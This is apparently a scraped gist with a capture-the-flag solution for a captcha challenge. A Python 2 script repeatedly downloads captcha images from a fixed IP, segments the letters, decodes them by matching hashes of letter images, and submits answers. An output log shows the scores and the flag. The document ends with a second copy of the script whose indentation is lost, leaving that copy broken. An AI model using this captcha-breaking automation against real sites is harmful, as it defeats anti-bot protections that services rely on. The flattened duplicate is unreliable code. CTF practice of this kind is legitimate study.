captn3m0/01-README.md

## 01-README.md

      
    Raw
  

              01-README.md
            
          
    #Output
Final output of the tool
Attempt number 50
Code is yGrkeP
           Score :50 
Attempt number 51
Code is tcrYlt
           Score :51Flag is H@CKIM_C@pTcha!09022015 
Attempt number 52
Code is bwMEMB
           Score :52Flag is H@CKIM_C@pTcha!09022015 
Attempt number 53
Code is uxEYEI
           Score :53Flag is H@CKIM_C@pTcha!09022015 
Attempt number 54
Code is hIFBeJ
           Score :54Flag is H@CKIM_C@pTcha!09022015 
Attempt number 55


## captcha.png

      
    Raw
  

              captcha.png
            
          
## captcha.py
from PIL import Image
import requests
import sys
import glob
import hashlib
import os
# Load the training set
#
###########################
DICTIONARY = {}

for filename in glob.iglob('letters/*'):
  md5 = hashlib.md5(open(filename, 'rb').read()).hexdigest()
  char = os.path.splitext(os.path.basename(filename))[0]
  DICTIONARY[md5] = char


s = requests.Session()
s.get("http://54.165.191.231/captcha.php") # So we get the cookie
##############################
# Now we keep making requests to the captcha

for n_pass in xrange(1,1000):
  print "Attempt number %s"%n_pass
  r = s.get('http://54.165.191.231/imagedemo.php')
  f = open("captcha.png", 'wb')
  f.write(r.content)
  f.close()

  # Now we break the captcha
  im = Image.open("captcha.png")
  im = im.convert("P")
  im2 = Image.new("P",im.size,255)
  im = im.convert("P")

  temp = {}

  for x in range(im.size[1]):
    for y in range(im.size[0]):
      pix = im.getpixel((y,x))
      temp[pix] = pix
      if pix >200 and pix<212: # these are the numbers to get
        im2.putpixel((y,x),0)

  inletter = False
  foundletter=False
  start = 0
  end = 0

  # im2 now has black captcha
  letters = []

  for y in range(im2.size[0]): # slice across
    for x in range(im2.size[1]): # slice down
      pix = im2.getpixel((y,x))
      if pix != 255:
        inletter = True
    if foundletter == False and inletter == True:
      foundletter = True
      start = y

    if foundletter == True and inletter == False:
      foundletter = False
      end = y
      letters.append((start,end))

    inletter=False

  # letters now contains the cordinates
  #
  count = 0

  for index, letter in enumerate(letters):
    im3 = im2.crop(( letter[0] , 0, letter[1],im2.size[1] ))
    im3.save("%s.gif"%(index))
    count += 1

  # Lets see######################
  code = ""
  for index, letter in enumerate(letters):
    md5 = hashlib.md5(open("%s.gif"%(index), 'rb').read()).hexdigest()
    code += DICTIONARY[md5]

  print "Code is %s"%code

  payload = {'solution': code, 'Submit': 'Submit'}
  response = s.post("http://54.165.191.231/verify.php", data=payload)
  html = response.text.split("\n")
  print html[23]
  ###############################

## dataset.tar.gz

      
    Raw
  

              dataset.tar.gz
            
          
      This file has been truncated, but you can view the full file.
    

            View raw
        
    
## extract.py

      
    Raw
  

              extract.py
            
          
            View raw
              (Sorry about that, but we can’t show files that are this big right now.)
        
    
## letters.tar.gz

      
    Raw
  

              letters.tar.gz
            
          
            View raw
              (Sorry about that, but we can’t show files that are this big right now.)
	from PIL import Image
	import requests
	import sys
	import glob
	import hashlib
	import os
	# Load the training set
	#
	###########################
	DICTIONARY = {}

	for filename in glob.iglob('letters/*'):
	md5 = hashlib.md5(open(filename, 'rb').read()).hexdigest()
	char = os.path.splitext(os.path.basename(filename))[0]
	DICTIONARY[md5] = char


	s = requests.Session()
	s.get("http://54.165.191.231/captcha.php") # So we get the cookie
	##############################
	# Now we keep making requests to the captcha

	for n_pass in xrange(1,1000):
	print "Attempt number %s"%n_pass
	r = s.get('http://54.165.191.231/imagedemo.php')
	f = open("captcha.png", 'wb')
	f.write(r.content)
	f.close()

	# Now we break the captcha
	im = Image.open("captcha.png")
	im = im.convert("P")
	im2 = Image.new("P",im.size,255)
	im = im.convert("P")

	temp = {}

	for x in range(im.size[1]):
	for y in range(im.size[0]):
	pix = im.getpixel((y,x))
	temp[pix] = pix
	if pix >200 and pix<212: # these are the numbers to get
	im2.putpixel((y,x),0)

	inletter = False
	foundletter=False
	start = 0
	end = 0

	# im2 now has black captcha
	letters = []

	for y in range(im2.size[0]): # slice across
	for x in range(im2.size[1]): # slice down
	pix = im2.getpixel((y,x))
	if pix != 255:
	inletter = True
	if foundletter == False and inletter == True:
	foundletter = True
	start = y

	if foundletter == True and inletter == False:
	foundletter = False
	end = y
	letters.append((start,end))

	inletter=False

	# letters now contains the cordinates
	#
	count = 0

	for index, letter in enumerate(letters):
	im3 = im2.crop(( letter[0] , 0, letter[1],im2.size[1] ))
	im3.save("%s.gif"%(index))
	count += 1

	# Lets see######################
	code = ""
	for index, letter in enumerate(letters):
	md5 = hashlib.md5(open("%s.gif"%(index), 'rb').read()).hexdigest()
	code += DICTIONARY[md5]

	print "Code is %s"%code

	payload = {'solution': code, 'Submit': 'Submit'}
	response = s.post("http://54.165.191.231/verify.php", data=payload)
	html = response.text.split("\n")
	print html[23]
	###############################